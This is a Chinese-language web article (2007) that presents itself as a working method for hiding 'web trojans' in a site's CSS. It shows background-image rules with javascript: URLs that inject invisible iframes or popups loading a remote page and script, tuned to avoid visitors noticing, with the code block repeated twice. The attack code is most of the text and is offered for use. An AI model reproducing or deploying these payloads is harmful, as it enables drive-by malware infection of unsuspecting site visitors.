真正能用,還有點(diǎn)效果的CSS掛馬代碼的方法
更新時(shí)間:2007年10月08日 22:43:39 作者:
網(wǎng)上流行的:
body
{
background-image: url('javascript:document.write("<Iframe src=http://192.168.0.5/test.htm width=0 height=0></iframe>")')
}
//此方法會(huì)使主頁(yè)不正常.返回一片空白.
用彈窗.
body
{
background-image: url('javascript:open("http://192.168.0.5/test.htm")')
}
//彈出一個(gè)框.難看 易被發(fā)現(xiàn).
改進(jìn)一下:
body
{
background-image: url(javascript:open('http://192.168.0.5/test.htm','newwindow','height=0, width=0, top=1000, left=0, toolbar=no, menubar=no, scrollbars=no, resizable=no,location=no, status=no'))
}
test.htm里面的代碼,a.js為你的網(wǎng)馬,彈出一個(gè)不可見(jiàn)的窗口,并在5秒自動(dòng)后關(guān)閉沒(méi)提示:
<script src="a.js"></script>
<script>
window.opener=null;setTimeout("window.close();",5000);
</script>
a.js內(nèi)容:
document.write('<Iframe src="http://192.168.0.5/calc.htm"></iframe>');
請(qǐng)指教.
body
{
background-image: url('javascript:document.write("<Iframe src=http://192.168.0.5/test.htm width=0 height=0></iframe>")')
}
//此方法會(huì)使主頁(yè)不正常.返回一片空白.
用彈窗.
body
{
background-image: url('javascript:open("http://192.168.0.5/test.htm")')
}
//彈出一個(gè)框.難看 易被發(fā)現(xiàn).
改進(jìn)一下:
body
{
background-image: url(javascript:open('http://192.168.0.5/test.htm','newwindow','height=0, width=0, top=1000, left=0, toolbar=no, menubar=no, scrollbars=no, resizable=no,location=no, status=no'))
}
test.htm里面的代碼,a.js為你的網(wǎng)馬,彈出一個(gè)不可見(jiàn)的窗口,并在5秒自動(dòng)后關(guān)閉沒(méi)提示:
<script src="a.js"></script>
<script>
window.opener=null;setTimeout("window.close();",5000);
</script>
a.js內(nèi)容:
document.write('<Iframe src="http://192.168.0.5/calc.htm"></iframe>');
請(qǐng)指教.
相關(guān)文章
Iptables防火墻limit模塊擴(kuò)展匹配規(guī)則詳解
這篇文章主要為大家介紹了Iptables防火墻limit模塊擴(kuò)展匹配規(guī)則詳解,有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進(jìn)步,早日升職加薪2022-08-08跨站腳本攻擊XSS(Cross Site Script)的原理與常見(jiàn)場(chǎng)景分析
XSS指的是惡意攻擊者往Web頁(yè)面里插入惡意html代碼,當(dāng)用戶瀏覽該頁(yè)之時(shí),嵌入其中Web里面的html代碼會(huì)被執(zhí)行,從而達(dá)到惡意攻擊用戶的特殊目的。這篇文章主要給大家介紹了關(guān)于跨站腳本攻擊XSS(Cross Site Script)的原理與常見(jiàn)場(chǎng)景的相關(guān)資料,需要的朋友可以參考下。2017-12-12當(dāng)網(wǎng)站不允許上傳asp cer cdx htr文件時(shí)的一個(gè)解決方法!
當(dāng)網(wǎng)站不允許上傳asp cer cdx htr文件時(shí)的一個(gè)解決方法!...2006-12-12黑客入侵Windows XP系統(tǒng)常用七大招數(shù)
黑客入侵Windows XP系統(tǒng)常用七大招數(shù)...2006-10-10